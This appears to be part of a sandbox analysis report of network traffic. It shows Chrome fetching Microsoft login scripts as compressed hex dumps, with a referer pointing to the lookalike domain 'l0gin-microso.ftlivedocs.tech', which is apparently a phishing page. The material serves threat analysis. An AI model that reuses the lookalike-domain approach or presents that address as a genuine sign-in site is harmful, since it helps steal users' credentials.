                                                                                                                              2024-10-04 13:11:13 UTC15593INData Raw: 1f 8b 08 00 00 00 00 00 04 00 dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 43 29 24 19 d1 04 8a 60 bf 01 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 db b5 3f 8d bd c0 df 13 fb 8f ea 77 21 d8 f3 f7 1f bd db 3d ef 47 ff e7 fd 50 c4 eb d0 2f e0 ef 92 f8 b4 0a c2 38 7a f5 d1 0d 0b 71 03 5f 35 1e e5 bb fa e3 67 c7 9b d5 7d 67 11 b8 33 31 ab ff a1 f2 f9 95 6c 2a b0 e9 d4 5d 2c f6 62 d5 83 13 3b c9 ef 60 1f 1e b8 59 e3 0f e5 a4 e0 33 0e e3 35 1e 75 47 41 69 d9 10 4e 50 9a 36 3c f8 77 d5 28 16 9d 60 af bc ff 79 ef c7 64 1a 4e e0 78 00 fc 5e 75 9f a0 f4 1b de 5e 05 fa 87 3f 87 fb 4e 08 7f 8e f6
                                                                                                                              Data Ascii: }Ms#\@'FC)$`Qx7}'}?e#QU]Vo?w!=GP/8zq_5g}g31l*],b;`Y35uGAiNP6<w(`ydNx^u^?N
                                                                                                                              2024-10-04 13:11:13 UTC733INData Raw: c0 f5 c3 79 67 55 de 72 6e 30 47 45 07 e2 e0 a1 a2 03 90 e8 a9 c6 72 0b fd 96 e1 b7 f4 fb 30 27 7d 00 6e 0b 06 59 a2 2f a7 1c 41 90 d7 5b 39 85 15 c9 af 0c df e0 d5 1a c3 7b 00 1d 0f 96 cc 31 14 f8 fd 00 92 38 f0 07 26 68 1f 8a 8f 02 83 09 f8 cc cc 8d 10 e1 e4 34 aa 0f 19 70 c2 8e cc 1c 39 82 4b ab 1f 9a f8 7d 5e 19 dd 82 51 6d 02 c8 68 0d cb 82 19 3d e0 68 3d 30 aa b2 07 f1 03 a3 85 32 be c1 a2 68 3c 24 e9 d6 00 eb 78 77 f8 c7 f3 e6 f9 e9 f9 49 d1 16 aa f8 dc e2 69 8e a0 fd 42 2a 87 f5 62 64 3c c1 2e c0 ac c9 aa 68 99 3c f0 39 1d 83 58 1d 4b 3a 00 96 ae dc 70 b4 e4 a7 ce 65 58 05 b4 fb 8e bc bf 10 3f 36 46 40 70 c5 0c 77 b9 d3 3a eb 0f b1 16 fb 6f 13 4b 51 87 90 96 0d 41 58 63 98 25 73 3f 2c 27 3c fd b0 42 76 1c 0c 01 29 d3 64 e9 c3 21 1c b1 69 b0 ed 3a
                                                                                                                              Data Ascii: ygUrn0GEr0'}nY/A[9{18&h4p9K}^Qmh=h=02h<$xwIiB*bd<.h<9XK:peX?6F@pw:oKQAXc%s?,'<Bv)d!i:


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              47192.168.2.174981513.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:13 UTC622OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:13 UTC813INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:13 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 116365
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                              ETag: 0x8DCBD5317046A2F
                                                                                                                              x-ms-request-id: 81b58fb2-b01e-0059-76aa-0f336a000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131113Z-15767c5fc554l9xf959gp9cb1s00000006ug00000000339f
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:13 UTC15571INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 6b 5b db 48 b6 28 fc 7d ff 0a 5b bb c7 2d b5 0b 63 19 30 44 46 78 48 42 7a 98 49 02 07 c8 f4 f4 10 4f 1e 61 97 b1 12 23 79 74 e1 d2 d8 fb b7 bf 6b ad aa 92 4a b2 0c 26 dd fb 9c 0f ef f4 d3 c1 ba 94 ea 5e eb 7e d9 fc a9 fe 5f b5 9f 6a 1b eb ff 57 3b bf 38 3c bb a8 9d bc ab 5d fc e5 f8 ec 6d ed 14 ee 7e ad 7d 3c b9 38 7e 73 b4 7e 3d d8 28 fe bb 98 f8 71 6d ec 4f 79 0d 7e af bc 98 8f 6a 61 50 0b a3 9a 1f 0c c3 68 16 46 5e c2 e3 da 0d fc 8d 7c 6f 5a 1b 47 e1 4d 2d 99 f0 da 2c 0a bf f2 61 12 d7 a6 7e 9c c0 47 57 7c 1a de d5 4c a8 2e 1a d5 4e bd 28 79 a8 1d 9f 5a 2d a8 9f 43 6d fe b5 1f c0 d7 c3 70 f6 00 d7 93 a4 16 84 89 3f e4 35 2f 18 51 6d 53 b8 09 62 5e 4b 83 11 8f 6a 77 13 7f 38 a9 7d f0 87 51 18 87 e3 a4 16 f1 21 f7 6f
                                                                                                                              Data Ascii: k[H(}[-c0DFxHBzIOa#ytkJ&^~_jW;8<]m~}<8~s~=(qmOy~jaPhF^|oZGM-,a~GW|L.N(yZ-Cmp?5/QmSb^Kjw8}Q!o
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: c6 f1 60 48 76 39 a2 ca 7d 0a c4 6c 46 7b 28 72 48 0c 1b 29 1f 49 83 69 74 84 3e 47 59 80 42 9b b2 59 ca d8 88 5e 36 a7 24 f7 af 17 38 0d 53 1c 3e 97 dc 17 24 8a 0d 4a a7 01 95 4d e2 5c ba e4 61 91 1d cc fc 76 23 bb 17 d9 47 55 e3 fb 1d 24 72 d5 75 be 53 62 b7 c3 d2 4d f8 e3 e1 9f 08 fe 94 d8 cb 4c b2 60 93 73 a2 08 7c dd c2 cc 73 9f 8e 83 c4 ee be 3e 32 f9 4f b1 b5 a0 9d 4a e3 1e bb 1b c2 d1 c8 77 a3 9e bf 9f 52 28 74 4a 36 90 30 df 82 5a d0 d6 7a 03 ab 1b c3 71 f0 37 c6 a2 a7 e2 09 4c c4 d8 f5 2d 06 8f 9b b6 66 12 5d 1b ff 14 d3 96 df 40 63 44 2c e6 6f b8 f8 2d c3 e6 72 5b e7 a8 e9 1d a4 c2 f9 71 c3 23 61 49 cf 47 27 27 7f 63 23 57 e2 4e 51 f5 3a 81 a7 93 7d af 37 d1 7a d7 44 92 9b fa 37 81 4e 4d 11 fd 88 ec b6 68 ac 96 e7 17 55 b3 97 4f d5 55 ce e4 46
                                                                                                                              Data Ascii: `Hv9}lF{(rH)Iit>GYBY^6$8S>$JM\av#GU$ruSbML`s|s>2OJwR(tJ60Zzq7L-f]@cD,o-r[q#aIG''c#WNQ:}7zD7NMhUOUF
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: d6 d6 bf a7 c9 82 82 ed 58 a9 a7 1e 3e d1 2c 29 8c 92 ca 92 96 69 33 da 9c 35 38 fc d6 d6 60 90 eb 41 a0 12 7b 42 d2 a3 7c 11 42 9b 34 a2 89 fa ac 50 54 6d 90 84 ac 5a 8e c0 f6 f8 15 ad ba d6 15 90 17 54 c3 6f b0 8f f9 f7 1b 9e 4f e9 71 33 74 f5 c0 fd e6 30 a7 21 7d a1 5d 47 f8 42 c3 4d be f3 4f 41 ba 44 02 66 76 07 a0 26 a7 28 74 99 e0 3b c9 b0 c7 62 54 65 49 f7 30 01 73 38 73 93 6f be 83 38 82 66 ee ce ce 1e 6e 0d f8 b1 f5 0c 45 5a dc 2d bb 1e b9 c6 a8 1c a5 3d e7 d3 a7 01 cc 63 fd e7 fc 53 3e 06 6a 35 fc f4 09 4b f4 c5 6e dd 03 86 b1 25 2e c8 49 20 ba c1 d7 11 55 f4 05 62 8b c7 b5 5e f7 e2 9e ef 6c 35 b7 f6 9a 6d 87 5d 61 90 56 d2 75 a6 25 9c a5 be 73 39 49 2f c2 89 c3 06 e9 f4 2e 8b 2f c7 85 ef 7c bc 0d 9f ad 6c b6 da db eb 9b ad cd ed 95 17 51 82 39
                                                                                                                              Data Ascii: X>,)i358`A{B|B4PTmZToOq3t0!}]GBMOADfv&(t;bTeI0s8so8fnEZ-=cS>j5Kn%.I Ub^l5m]aVu%s9I/./|lQ9
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: a4 ca a6 93 a3 67 05 69 b4 c6 7e c4 d9 e3 39 43 68 1e b4 61 d1 c2 e6 08 96 6a d0 1c 75 d2 c3 bc a3 a2 68 ef 40 82 32 1c 1c 7b 39 fa ab 83 34 35 ee 0e dd d2 bd c6 a3 e3 da f3 7c fa 79 15 5c ca 3e 2f 40 6c be 3a bc e8 78 20 98 f4 2e e0 1d e4 fd 56 63 77 ca ae d9 1d 3a bf 64 68 0d bf 86 7f 8c a4 17 fe f8 eb 7d 5b d4 06 df ab e2 2b 59 bc 90 fa 71 8c 6d 52 7e a4 58 f9 fa 23 e9 ab 86 4c d4 b9 ba f0 c4 a4 6a a5 37 fb c1 26 5b c5 f2 30 9b 42 1c ab 21 ec 3a 8a cc 58 07 52 57 12 27 53 82 ac c7 c9 ad f0 1a cb f1 c6 54 45 5c 89 e4 5c bd 7e 67 7a 48 3c 46 dc 1b 4a 50 ba e3 2e 79 86 a5 3e ca 8a 99 87 ca 6b 17 98 cf 6e 0f 3e 00 68 d3 f7 f1 5f 4f 3b 19 98 1a 87 7b c1 08 f8 63 17 4f 7f ce 0c e0 45 fb 8b 27 9e ee 44 80 27 ce ab 3e 29 12 46 c4 b8 b4 78 ad c9 f6 06 5c b6 37
                                                                                                                              Data Ascii: gi~9Chajuh@2{945|y\>/@l:x .Vcw:dh}[+YqmR~X#Lj7&[0B!:XRW'STE\\~gzH<FJP.y>kn>h_O;{cOE'D'>)Fx\7
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 41 1f ce 63 f8 7c 38 cb 6e 62 8c 3e 56 eb 18 50 d0 d5 39 aa fa b8 ea f0 0c 5e b3 3c ed 39 82 c4 c7 f0 e9 f8 a9 11 fd ee 03 1a 02 ec ec bc 1e bd 0c cf 82 8f 18 b1 2f f9 88 f8 f5 23 27 ed f9 c8 49 92 e1 1d 56 8c 6e 6f f1 cf 94 ff 2c 77 76 ec 2f 77 7a 98 3c 16 d9 f0 ed 93 db db 13 5b d5 13 9e a8 98 80 40 5f 4f 91 e3 3d 11 94 39 fa 19 ba 7f ca ac ef 0d d6 09 1c 92 46 38 e2 5f c7 49 80 9e 8b 38 eb 6c 85 09 b4 62 9d 5b 1d 47 92 f1 80 12 5a 18 ff 2c 54 bd 88 98 d9 ee e6 6f 4b a0 df 82 eb 90 1a 8e 00 5a 51 5c b0 c2 e5 84 de 2e 50 30 f1 df 6e 0c 8b a6 ae c5 6b 1f 27 c6 89 07 4e c3 78 68 cd f9 b4 db 43 45 68 31 f4 4e bb b0 17 d0 fc 82 4d ac e3 d0 7d d5 09 af 3d bd d4 fe 19 1c c3 e9 22 e3 50 a5 b2 47 17 b0 3f bc 0a d5 2e 75 7a b8 4f b2 1e 67 34 d9 4e 63 97 9f 7b d6
                                                                                                                              Data Ascii: Ac|8nb>VP9^<9/#'IVno,wv/wz<[@_O=9F8_I8lb[GZ,ToKZQ\.P0nk'NxhCEh1NM}="PG?.uzOg4Nc{
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 6f 8f 8c 3d a0 b1 ba b9 56 ed db 8d 94 af 1a 74 72 fb 31 53 f0 93 bc 81 d3 83 bc d1 d3 83 6f 9c 02 6a e3 fb cf 03 ef f3 c6 93 51 af 57 f8 d0 5e 5b 41 b8 f6 c6 e1 d5 bf ff 20 b0 d5 6f 1c 43 7a 51 d7 1b c8 5f b4 24 71 d3 9b 0f a9 c9 b3 dd 0b f2 21 90 e4 43 24 09 25 4b 50 0d cf 8c 6f 62 e5 88 72 b3 63 51 46 52 e9 a5 cc 3b 9c 98 a6 0a 38 4d 85 3e df 95 f8 88 93 19 59 81 f6 42 13 0b 3c a8 2b 2c 2d 59 af b6 22 6e 07 b3 d5 11 28 e7 e0 30 d6 1d 1f c9 39 a8 6e 32 07 6f ac 59 1e 59 61 06 62 7c 2e 46 48 49 7c f6 91 70 d4 91 9b 81 f1 18 46 32 48 1c 20 d2 22 15 56 dd 08 24 98 bd d5 e8 1b 4f 8d 4c 62 15 e0 46 85 7d 25 72 e1 38 5e 7e 87 07 db e6 9f 6c e6 7d 32 ab ec c2 0d 57 35 d2 59 01 79 ee 6f 72 13 0d 85 da 8b c2 83 6c d0 0b 34 66 a5 dd 0c f0 9d ab f8 24 00 73 8c 07
                                                                                                                              Data Ascii: o=Vtr1SojQW^[A oCzQ_$q!C$%KPobrcQFR;8M>YB<+,-Y"n(09n2oYYab|.FHI|pF2H "V$OLbF}%r8^~l}2W5Yyorl4f$s
                                                                                                                              2024-10-04 13:11:13 UTC16384INData Raw: 28 6a 74 56 53 66 c5 fe cf 72 5c d8 9f 15 29 63 4d 91 32 d6 52 36 60 5b ac 09 30 f3 65 fb ce f6 e7 38 a2 0d 16 84 de c9 87 1f 4f 4a f8 36 33 60 db bc f3 8d 03 e9 66 d1 90 42 cf a6 8c fd 73 20 33 13 e0 aa f5 a5 40 6e 98 1e 23 65 91 c8 1f 22 65 95 88 25 a6 ed 09 b2 32 48 8d e5 00 61 76 8c 6d 19 c2 5e e8 e8 5e 3a 68 05 64 8e e3 55 ad b0 7d a3 83 90 da 2a 86 89 ff 9d c7 b5 4c 3e b3 9f 90 23 3f b5 f8 ac 9f a3 69 ac a8 c9 d7 f0 d0 a1 31 ea b0 ea 38 1e fd 81 54 43 6a 1c c9 64 bf 17 8b 88 be 28 f5 24 4f 23 ba 05 68 c1 47 42 db e7 a1 13 f6 2b fb 9b 6e 7b fe 7a ee ac 7b ca 26 59 1f ca 92 10 03 1c 99 6d 00 76 75 8c 2b c5 8d 05 8e f2 dd 2e 95 2d ec ca 58 d9 6b fb 4e 66 a6 cd 1d 6c b8 21 f1 95 ff f2 7e 8c bb ce 0d 00 36 ef 3f bd f7 5f 1e 44 1d cd 79 b1 33 af ad 20 dc
                                                                                                                              Data Ascii: (jtVSfr\)cM2R6`[0e8OJ63`fBs 3@n#e"e%2Havm^^:hdU}*L>#?i18TCjd($O#hGB+n{z{&Ymvu+.-XkNfl!~6?_Dy3
                                                                                                                              2024-10-04 13:11:13 UTC2490INData Raw: 76 68 98 bc a0 3f 40 4a 03 1c b3 42 1d 27 14 de 2c 30 3f 34 26 15 78 3c 32 d3 c9 17 b6 63 68 f2 5e 3e ca 38 c7 fa da b4 a6 b7 c9 4e e7 6b eb eb 52 5a e4 a3 63 e0 52 22 d0 e9 eb e5 b4 39 64 8c cb 89 81 6f d5 ca 69 80 28 8f c7 e5 c4 31 24 e6 e5 c4 29 24 a6 e5 c4 89 0f 04 77 29 6d e6 03 81 5d 4a 1b f9 40 80 97 d2 6e 7c 20 c6 4b 69 97 3e 50 1b a5 b4 73 1f 48 9c 52 da 85 0f a4 51 29 ed cc b7 9e 94 d3 ae d0 e1 5d 29 ed da b7 be 2d a7 1d c9 68 79 e3 e3 b4 66 7d f1 b5 ed ac f7 28 1c df ed 02 dd 2b ec 9b 9f eb f4 dd eb 7d 2b 33 dc 1d af db 7d ff f8 89 03 39 df f8 eb ad c1 71 0a 93 ff b5 bd 0e 9f d7 dd 17 14 4f 10 e3 02 ae 47 0f d8 5e 7f 74 4f dd e7 ee a1 fb d6 fd d5 7d e5 be 73 0f 7e 87 46 f4 ed c2 7d 89 4a 7c 59 a6 83 dc bb ef fd 83 56 74 1e 03 cf f7 82 63 43 7f
                                                                                                                              Data Ascii: vh?@JB',0?4&x<2ch^>8NkRZcR"9doi(1$)$w)m]J@n| Ki>PsHRQ)])-hyf}(+}+3}9qOG^tO}s~F}J|YVtcC


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              48192.168.2.174982313.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:13 UTC429OUTGET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_1yb3e7oii5t28dgo4xrtow2.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:14 UTC791INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:13 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 16326
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Tue, 27 Aug 2024 20:17:04 GMT
                                                                                                                              ETag: 0x8DCC6D537C7BF24
                                                                                                                              x-ms-request-id: 7f0ef5b1-b01e-0004-6fab-0f39ee000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131113Z-15767c5fc55472x4k7dmphmadg0000000cag0000000042g8
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:14 UTC15593INData Raw: 1f 8b 08 00 00 00 00 00 04 00 dd 7d 4d 73 23 c7 92 d8 dd bf 02 0f cf f1 86 5c f5 40 f8 e0 27 46 d0 18 04 c0 19 ec 90 00 04 80 43 29 24 19 d1 04 8a 60 bf 01 ba b1 dd 8d e1 f0 51 e3 78 37 1f f6 e0 ab 7d f3 c1 27 1f 7d f1 dd 3f 65 23 d6 bf c3 f9 51 55 5d d5 dd 00 c8 91 56 6f d7 0a c5 10 dd f5 95 95 95 95 95 99 95 99 fd 87 db b5 3f 8d bd c0 df 13 fb 8f ea 77 21 d8 f3 f7 1f bd db 3d ef 47 ff e7 fd 50 c4 eb d0 2f e0 ef 92 f8 b4 0a c2 38 7a f5 d1 0d 0b 71 03 5f 35 1e e5 bb fa e3 67 c7 9b d5 7d 67 11 b8 33 31 ab ff a1 f2 f9 95 6c 2a b0 e9 d4 5d 2c f6 62 d5 83 13 3b c9 ef 60 1f 1e b8 59 e3 0f e5 a4 e0 33 0e e3 35 1e 75 47 41 69 d9 10 4e 50 9a 36 3c f8 77 d5 28 16 9d 60 af bc ff 79 ef c7 64 1a 4e e0 78 00 fc 5e 75 9f a0 f4 1b de 5e 05 fa 87 3f 87 fb 4e 08 7f 8e f6
                                                                                                                              Data Ascii: }Ms#\@'FC)$`Qx7}'}?e#QU]Vo?w!=GP/8zq_5g}g31l*],b;`Y35uGAiNP6<w(`ydNx^u^?N
                                                                                                                              2024-10-04 13:11:14 UTC733INData Raw: c0 f5 c3 79 67 55 de 72 6e 30 47 45 07 e2 e0 a1 a2 03 90 e8 a9 c6 72 0b fd 96 e1 b7 f4 fb 30 27 7d 00 6e 0b 06 59 a2 2f a7 1c 41 90 d7 5b 39 85 15 c9 af 0c df e0 d5 1a c3 7b 00 1d 0f 96 cc 31 14 f8 fd 00 92 38 f0 07 26 68 1f 8a 8f 02 83 09 f8 cc cc 8d 10 e1 e4 34 aa 0f 19 70 c2 8e cc 1c 39 82 4b ab 1f 9a f8 7d 5e 19 dd 82 51 6d 02 c8 68 0d cb 82 19 3d e0 68 3d 30 aa b2 07 f1 03 a3 85 32 be c1 a2 68 3c 24 e9 d6 00 eb 78 77 f8 c7 f3 e6 f9 e9 f9 49 d1 16 aa f8 dc e2 69 8e a0 fd 42 2a 87 f5 62 64 3c c1 2e c0 ac c9 aa 68 99 3c f0 39 1d 83 58 1d 4b 3a 00 96 ae dc 70 b4 e4 a7 ce 65 58 05 b4 fb 8e bc bf 10 3f 36 46 40 70 c5 0c 77 b9 d3 3a eb 0f b1 16 fb 6f 13 4b 51 87 90 96 0d 41 58 63 98 25 73 3f 2c 27 3c fd b0 42 76 1c 0c 01 29 d3 64 e9 c3 21 1c b1 69 b0 ed 3a
                                                                                                                              Data Ascii: ygUrn0GEr0'}nY/A[9{18&h4p9K}^Qmh=h=02h<$xwIiB*bd<.h<9XK:peX?6F@pw:oKQAXc%s?,'<Bv)d!i:


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              49192.168.2.174982413.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:14 UTC410OUTGET /shared/1.0/content/js/ConvergedLogin_PCore_ELtAAt2Ya8ISGuc0PJcBKA2.js HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:14 UTC798INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:14 GMT
                                                                                                                              Content-Type: application/x-javascript
                                                                                                                              Content-Length: 122193
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Last-Modified: Wed, 04 Sep 2024 01:33:09 GMT
                                                                                                                              ETag: 0x8DCCC8188A08D46
                                                                                                                              x-ms-request-id: a6e6408e-701e-003f-0d12-103458000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131114Z-15767c5fc55tsfp92w7yna557w0000000ch000000000fg8m
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:14 UTC15586INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 7b 57 e3 48 92 38 fa ff fd 14 46 33 97 b6 1b 61 2c bf b0 45 ab 59 63 a0 8a 69 c0 0c 86 ea 9e a5 18 8e 2c a5 8d 1a 59 f2 4a 32 8f 31 de cf fe 8b 88 cc 94 52 b6 4c 55 cd ee b9 f7 dc 73 e7 51 58 99 91 af c8 c8 c8 88 c8 c8 c8 bd 9f b7 fe af d2 cf a5 dd ef ff 4f 69 78 d3 bb be 29 0d 4e 4b 37 9f cf ae 8f 4b 57 f0 f5 8f d2 e5 e0 e6 ac 7f f2 fd f5 60 a3 f8 ff 9b 47 2f 2e 8d 3d 9f 95 e0 ef c8 8e 99 5b 0a 83 52 18 95 bc c0 09 a3 59 18 d9 09 8b 4b 53 f8 37 f2 6c bf 34 8e c2 69 29 79 64 a5 59 14 fe c9 9c 24 2e f9 5e 9c 40 a1 11 f3 c3 97 52 19 aa 8b dc d2 95 1d 25 6f a5 b3 ab 4a 15 ea 67 50 9b 37 f1 02 28 ed 84 b3 37 f8 fd 98 94 82 30 f1 1c 56 b2 03 97 6a f3 e1 23 88 59 69 1e b8 2c 2a bd 3c 7a ce 63 e9 c2 73 a2 30 0e c7 49 29 62 0e
                                                                                                                              Data Ascii: {WH8F3a,EYci,YJ21RLUsQXOix)NK7KW`G/.=[RYKS7l4i)ydY$.^@R%oJgP7(70Vj#Yi,*<zcs0I)b
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 5a 40 01 48 3f 65 7e fe 9d 70 17 86 b2 5a 68 c6 d8 53 99 2b af 38 61 68 21 9b ce f0 76 06 77 2f b1 8a f6 1c e0 29 00 38 c8 06 c3 b2 0a 2b df 30 39 1d 64 f6 0d 4f 7a e2 7e 34 6d 3a 9a 00 0c 34 01 08 95 1f a4 6f 71 e1 37 9b b1 78 a5 1c ea ef e8 81 02 0a d3 b1 1d 3d 65 57 f3 d1 f7 33 e7 1d 77 84 3e 5b e4 6f 88 37 0e 56 73 7f 47 df 2d 25 77 ad 3e cb 46 b1 09 fd 59 e9 9a c6 25 5e 69 86 3d a4 ea 02 54 96 92 e8 0a dd c2 1a 8f 36 b8 e8 31 2b aa 16 b9 42 96 2b 1f f5 5b f8 9d e1 36 fa d1 00 84 23 1a 82 2d d1 a8 e4 55 1d 39 d3 31 2c 3a 0c 18 07 db b4 66 53 10 09 0c e7 b8 eb e1 00 b8 8f 67 e8 6b fa e2 d9 63 2f 68 1b f4 cd 05 5f 49 5f d2 84 a2 d5 ed ad f3 4c d4 f3 44 d8 0b 44 4c 5c 78 f3 82 ab 26 01 e4 a3 c7 f5 32 bb 60 81 8c 06 67 3a 21 1f 45 b4 1c 02 ad c9 fa cc a4
                                                                                                                              Data Ascii: Z@H?e~pZhS+8ah!vw/)8+09dOz~4m:4oq7x=eW3w>[o7VsG-%w>FY%^i=T61+B+[6#-U91,:fSgkc/h_I_LDDL\x&2`g:!E
                                                                                                                              2024-10-04 13:11:14 UTC16384INData Raw: 77 01 ab 86 93 13 0d e2 04 ad c1 bb 90 2b c3 9b df 13 1b 27 31 62 9a df 88 b4 22 90 79 9f bc 0f 9c 27 11 fb 1f b8 72 a6 d3 af de 87 e3 dd 83 c3 37 64 0e c5 fd 5c 9d 61 05 a8 a8 c7 32 2f 55 dd 9b 53 55 9e d8 44 8b 91 7e 0a 94 60 d1 1a 25 3d 4c a7 67 62 6e 14 d4 3d c4 dd 94 09 78 03 83 b1 98 8c 98 fa 44 64 c2 09 39 8c 7b 11 12 01 b7 84 d2 68 0b 3f 42 3a 43 9e 37 ea 66 1f 11 96 d2 99 0b de 60 31 6c 06 7e 1f 60 2f e5 2b 1b 5c 43 6a dd 95 0d ee cc 69 5c a5 09 1f 25 9d b5 6c f7 bc 62 11 b4 c2 84 82 a9 45 99 57 f5 2c 9d e8 c5 38 e0 86 3e a7 79 15 8b 8b 56 aa 40 4d 64 ec bc 31 ab ab 6d 1e 6e 1b c3 dc 45 ef e1 4c 03 88 3c c8 3e b0 fe 39 35 52 5e c9 79 43 d9 d1 ca d5 54 a3 b6 ee c4 5d a8 6b 63 07 30 7d a6 73 b4 dd 65 ba 72 a1 7a df 6c a7 fe fe d6 5e 4e e4 90 95 6e
                                                                                                                              Data Ascii: w+'1b"y'r7d\a2/USUD~`%=Lgbn=xDd9{h?B:C7f`1l~`/+\Cji\%lbEW,8>yV@Md1mnEL<>95R^yCT]kc0}serzl^Nn
